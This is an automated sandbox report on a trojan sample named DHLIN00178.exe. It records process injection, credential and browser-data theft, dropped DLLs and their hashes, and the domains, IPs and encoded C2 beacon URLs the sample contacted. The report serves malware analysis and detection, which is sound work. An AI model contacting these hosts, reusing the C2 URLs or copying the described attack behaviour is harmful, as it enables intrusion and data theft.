        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Timestomp | NTDS | 12 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 4 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 711 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph (ID: 829130, Sample: DHLIN00178.exe, Startdate: 17/03/2023, Architecture: WINDOWS, Score: 100), rendered as a process tree with the DNS/IP info and signatures attached to each node (numbers in brackets are the created registry value / file counts shown on the node):

        • Start: www.verde-amar.info; www.spotcheck.site; 24 other IPs or domains. Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures.
        • DHLIN00178.exe started [1 41]. Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Users\user\...\maintenanceservice2.exe (PE32+); 5 other files (none is malicious). Signatures: Tries to detect Any.run.
          • DHLIN00178.exe started [6]. DNS/IP: machupichuturismo.com 162.213.255.18, ports 49837, 80, NAMECHEAP-NETUS, United States. Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 2 other signatures.
            • explorer.exe injected [3 1]. DNS/IP: gy.adsfzcvx.com 154.210.212.94, ports 49891, 49892, 49893, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; www.cmproutdoors.com 156.255.170.114, ports 49883, 49884, 49885, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; 14 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit).
              • cscript.exe started [13]. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; 3 other signatures.
                • firefox.exe started.
                  • WerFault.exe started [4].

        Submitted file

        Source | Detection | Scanner | Label
        DHLIN00178.exe | 8% | ReversingLabs | Win32.Trojan.Generic
        DHLIN00178.exe | 12% | Virustotal |

        Dropped files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsj54D2.tmp\System.dll | 0% | ReversingLabs |

        Unpacked PE files

        Source | Detection | Scanner | Label
        7.2.explorer.exe.14163814.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
        1.2.DHLIN00178.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
        5.0.DHLIN00178.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
        9.2.firefox.exe.1e1f3814.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
        8.2.cscript.exe.4f33814.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
        1.0.DHLIN00178.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491

        Domains

        Source | Detection | Scanner | Label
        td-ccm-168-233.wixdns.net | 0% | Virustotal |
        popcors.com | 1% | Virustotal |
        www.riverflow.net | 4% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
td-ccm-168-233.wixdns.net | 34.117.168.233 | true | true | - | unknown
popcors.com | 173.230.227.171 | true | true | - | unknown
www.spotcheck.site | 199.192.30.193 | true | true | - | unknown
gy.adsfzcvx.com | 154.210.212.94 | true | true | - | unknown
www.riverflow.net | 64.190.63.111 | true | true | - | unknown
hk.ygrcw.cn | 164.88.122.250 | true | true | - | unknown
www.sem-jobs.com | 85.13.156.177 | true | true | - | unknown
www.dinggubd.net | 38.163.2.19 | true | true | - | unknown
u4tgw7dr.n.funnull35.com | 103.20.61.209 | true | true | - | unknown
adasoft.info | 81.88.48.71 | true | true | - | unknown
www.hot6s.com | 104.21.8.203 | true | true | - | unknown
machupichuturismo.com | 162.213.255.18 | true | false | - | unknown
www.hhkk143.cfd | 188.114.96.3 | true | true | - | unknown
daon3999.net | 222.122.213.231 | true | true | - | unknown
www.casinoenligne-france.info | 3.9.182.46 | true | true | - | unknown
www.cmproutdoors.com | 156.255.170.114 | true | true | - | unknown
www.verde-amar.info | 185.53.177.54 | true | true | - | unknown
www.popcors.com | unknown | unknown | true | - | unknown
www.sandyhillsagritourism.com | unknown | unknown | true | - | unknown
www.0w3jy.com | unknown | unknown | true | - | unknown
www.37123.vip | unknown | unknown | true | - | unknown
www.daon3999.net | unknown | unknown | true | - | unknown
www.5319ss.com | unknown | unknown | true | - | unknown
www.adasoft.info | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.0w3jy.com/i9th/ | true | Avira URL Cloud: safe | unknown
http://www.hhkk143.cfd/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.cmproutdoors.com/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.popcors.com/i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== | true | Avira URL Cloud: malware | unknown
http://www.popcors.com/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.37123.vip/i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY | true | Avira URL Cloud: malware | unknown
http://www.sem-jobs.com/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.0w3jy.com/i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== | true | Avira URL Cloud: safe | unknown
http://www.hot6s.com/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.riverflow.net/i9th/ | true | Avira URL Cloud: safe | unknown
http://www.casinoenligne-france.info/i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== | true | Avira URL Cloud: malware | unknown
http://www.adasoft.info/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.sandyhillsagritourism.com/i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== | true | Avira URL Cloud: malware | unknown
http://www.spotcheck.site/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.riverflow.net/i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== | true | Avira URL Cloud: safe | unknown
http://www.5319ss.com/i9th/ | true | Avira URL Cloud: safe | unknown
http://www.37123.vip/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.daon3999.net/i9th/ | true | Avira URL Cloud: safe | unknown
http://www.verde-amar.info/i9th/ | true | Avira URL Cloud: safe | unknown
http://www.daon3999.net/i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== | true | Avira URL Cloud: safe | unknown
http://www.hhkk143.cfd/i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY | true | Avira URL Cloud: malware | unknown
http://www.adasoft.info/i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== | true | Avira URL Cloud: malware | unknown
http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bin | false | Avira URL Cloud: safe | unknown
http://www.dinggubd.net/i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== | true | Avira URL Cloud: malware | unknown
http://www.dinggubd.net/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.verde-amar.info/i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY | true | Avira URL Cloud: safe | unknown
http://www.5319ss.com/i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY | true | Avira URL Cloud: safe | unknown
http://www.sem-jobs.com/i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY | true | Avira URL Cloud: malware | unknown
http://www.casinoenligne-france.info/i9th/ | true | Avira URL Cloud: malware | unknown
http://www.spotcheck.site/i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY | true | Avira URL Cloud: malware | unknown
http://www.cmproutdoors.com/i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bincj | DHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | DHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmp | false | - | high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | DHLIN00178.exe, 00000005.00000001.5907937864.0000000000626000.00000020.00000001.01000000.00000005.sdmp | false | - | high
http://www.gopher.ftp://ftp. | DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/cps0( | DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/dotnet/runtime | DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | DHLIN00178.exe, DHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmp | false | - | high
https://aka.ms/dotnet-warnings/ | DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.symauth.com/rpa00 | DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.nero.com | DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
https://mozilla.org0 | DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.8.203 | www.hot6s.com | United States | 13335 | CLOUDFLARENETUS | true
156.255.170.114 | www.cmproutdoors.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
222.122.213.231 | daon3999.net | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
34.117.168.233 | td-ccm-168-233.wixdns.net | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
64.190.63.111 | www.riverflow.net | United States | 11696 | NBS11696US | true
3.9.182.46 | www.casinoenligne-france.info | United States | 16509 | AMAZON-02US | true
199.192.30.193 | www.spotcheck.site | United States | 22612 | NAMECHEAP-NETUS | true
38.163.2.19 | www.dinggubd.net | United States | 174 | COGENT-174US | true
185.53.177.54 | www.verde-amar.info | Germany | 61969 | TEAMINTERNET-ASDE | true
188.114.96.3 | www.hhkk143.cfd | European Union | 13335 | CLOUDFLARENETUS | true
154.210.212.94 | gy.adsfzcvx.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
103.20.61.209 | u4tgw7dr.n.funnull35.com | Hong Kong | 133380 | LAYER-ASLayerstackLimitedHK | true
85.13.156.177 | www.sem-jobs.com | Germany | 34788 | NMM-ASD-02742FriedersdorfHauptstrasse68DE | true
164.88.122.250 | hk.ygrcw.cn | South Africa | 137951 | CLAYERLIMITED-AS-APClayerLimitedHK | true
162.213.255.18 | machupichuturismo.com | United States | 22612 | NAMECHEAP-NETUS | false
81.88.48.71 | adasoft.info | Italy | 39729 | REGISTER-ASIT | true
173.230.227.171 | popcors.com | United States | 12180 | INTERNAP-2BLKUS | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 829130
Start date and time: 2023-03-17 21:33:08 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 3s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: DHLIN00178.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/11@19/17
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 6.4% (good quality ratio 6.1%)
• Quality average: 78.4%
• Quality standard deviation: 27.4%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.136, 20.190.160.22, 40.126.32.68, 20.190.160.20, 40.126.32.138, 40.126.32.76, 40.126.32.140
• Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, www.tm.v6.a.prd.aadg.akadns.net, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target DHLIN00178.exe, PID 1776 because there are no executed functions
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                                    No simulations
                                                                    No context
Process: C:\Users\user\Desktop\DHLIN00178.exe
File Type: ASCII text, with very long lines (53810), with no line terminators
Category: dropped
Size (bytes): 53810
Entropy (8bit): 2.6910915446582364
Encrypted: false
SSDEEP: 768:m5Bw4mEWCEEEEE87pG5nZpb+fPM3kgjx/6yE2xNLXnF+yB54yLvBkhBYq7oP8n5j:mlUnZpxU6xRLM2Lclp5weok
MD5: 7FB8B546EC10F0822FC0B4089E560733
SHA1: 2CEFF57E58D87662C329D3F1978CCBC6FCEB16DF
SHA-256: 6D868BCFDE2ECCB7EBD58E727C3DC32434DA3F21E0EF80AEA2C89E5F5A7F3642
SHA-512: 3F25762F1393CB4C9538B6005F00B8E122C029F05E542229D17EE6D761F0A91954C2CA79426650A8F1DE0310CB850E8E27AC2A713764BEB2719EBDE17A4CC59B
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\DHLIN00178.exe
File Type: data
Category: dropped
Size (bytes): 260228
Entropy (8bit): 7.296059267389181
Encrypted: false
SSDEEP: 3072:Frjq0MSUGUC72zwV6xCFAGSsIb0N1YK+S6RSojl8XfHtc9LtR866+Tq8oD7xYCBs:F0ZGUCT/Ib0NKSogfNc3HnW8oDHtswe
MD5: 3AE902DED608BA446C2B6FF0804D96BE
SHA1: D3B6BF0FFA9F017DACA457F4569A04AA086CD263
SHA-256: 377721BE18CEB08A0D3181A3C375C08F5B918FE7CB0509046AB911C9030CDB95
SHA-512: FECA207CF6E38A4DC94A266F02D84E86BDE14C6EC5F6859EADC38369955103BD707B97D09DEBEAD7CB5600D99E0A9043AF234FDBA221B674041844E926934FE8
Malicious: false
Preview: non-printable bytes only (rendered as dots in the report)
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):75248
                                                                    Entropy (8bit):6.149004775364808
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                                                    MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                                                    SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                                                    SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                                                    SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):485488
                                                                    Entropy (8bit):6.710350474742332
                                                                    Encrypted:false
                                                                    SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                                                    MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                                                    SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                                                    SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                                                    SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):102577
                                                                    Entropy (8bit):5.075179901575448
                                                                    Encrypted:false
                                                                    SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                                                    MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                                                    SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                                                    SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                                                    SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49768
                                                                    Entropy (8bit):5.650496280667822
                                                                    Encrypted:false
                                                                    SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                                                    MD5:BCC32F5B608C99F89508921B6333B329
                                                                    SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                                                    SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                                                    SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):36029
                                                                    Entropy (8bit):5.699900454607003
                                                                    Encrypted:false
                                                                    SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                                                    MD5:8A54723090530190EB11AFCD5B702B1B
                                                                    SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                                                    SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                                                    SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                                                    Malicious:false
